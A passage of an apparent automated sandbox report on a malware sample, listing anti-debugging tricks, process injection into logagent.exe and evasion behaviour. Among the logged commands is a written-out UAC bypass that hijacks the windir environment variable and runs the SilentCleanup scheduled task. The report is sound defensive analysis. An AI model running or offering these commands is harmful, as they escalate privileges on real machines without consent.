          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\logagent.exe TID: 7148Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\logagent.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\logagent.exeWindow / User API: threadDelayed 2013Jump to behavior
          Source: C:\Windows\SysWOW64\logagent.exeWindow / User API: threadDelayed 375Jump to behavior
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 17_2_104190D7 new,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,17_2_104190D7
          Source: C:\Windows\SysWOW64\logagent.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: logagent.exe, 00000011.00000002.691567421.0000000002B87000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

          Anti Debugging:

          barindex
          Hides threads from debuggersShow sources
          Source: C:\Windows\SysWOW64\logagent.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Windows\SysWOW64\logagent.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Windows\SysWOW64\logagent.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Windows\SysWOW64\logagent.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Windows\SysWOW64\logagent.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 17_2_106A4A7C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_106A4A7C
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 17_2_107F2730 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,17_2_107F2730
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 17_2_1041F6F5 __EH_prolog,GetProcessHeap,17_2_1041F6F5
          Source: C:\Windows\SysWOW64\logagent.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 17_2_106B482C mov eax, dword ptr fs:[00000030h]17_2_106B482C
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeCode function: 0_3_034D8164 LdrInitializeThunk,0_3_034D8164
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 17_2_1069A7EA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_1069A7EA
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 17_2_106A4A7C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_106A4A7C

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Writes to foreign memory regionsShow sources
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 5B0000Jump to behavior
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 840000Jump to behavior
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 850000Jump to behavior
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 860000Jump to behavior
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 870000Jump to behavior
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 5C0000Jump to behavior
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 5D0000Jump to behavior
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 5E0000Jump to behavior
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 5F0000Jump to behavior
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 800000Jump to behavior
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 810000Jump to behavior
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 820000Jump to behavior
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 830000Jump to behavior
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 28D0000Jump to behavior
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 28E0000Jump to behavior
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 28F0000Jump to behavior
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 2900000Jump to behavior
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 10410000Jump to behavior
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 2910000Jump to behavior
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 2920000Jump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 10410000 value starts with: 4D5AJump to behavior
          Creates a thread in another existing process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeThread created: C:\Windows\SysWOW64\logagent.exe EIP: 5B0000Jump to behavior
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeThread created: C:\Windows\SysWOW64\logagent.exe EIP: 870000Jump to behavior
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeThread created: C:\Windows\SysWOW64\logagent.exe EIP: 5F0000Jump to behavior
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeThread created: C:\Windows\SysWOW64\logagent.exe EIP: 830000Jump to behavior
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeThread created: C:\Windows\SysWOW64\logagent.exe EIP: 2900000Jump to behavior
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeThread created: C:\Windows\SysWOW64\logagent.exe EIP: 2920000Jump to behavior
          Source: C:\Users\user\Desktop\Dkvunfebdprvvugtyhevcozxmecjaaclna.exeProcess created: C:\Windows\SysWOW64\logagent.exe logagent.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.batJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /fJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add hkcu\Environment /v windir /d 'cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM 'Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /fJump to behavior
          Source: logagent.exe, 00000011.00000000.624327250.0000000003070000.00000002.00020000.sdmpBinary or memory string: Program Manager
          Source: logagent.exe, 00000011.00000000.624327250.0000000003070000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: logagent.exe, 00000011.00000000.624327250.0000000003070000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: logagent.exe, 00000011.00000000.624327250.0000000003070000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: logagent.exe, 00000011.00000003.665021305.000000000509D000.00000004.00000001.sdmpBinary or memory string: Program Manager;
          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 17_2_1041EA72 cpuid 17_2_1041EA72
          Source: C:\Users\Public\Libraries\Dkvunfe\Dkvunfe.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 17_2_1042369B __EH_prolog,GetSystemTimes,GetCurrentProcess,GetProcessTimes,GetTickCount64,17_2_1042369B

          Stealing of Sensitive Information: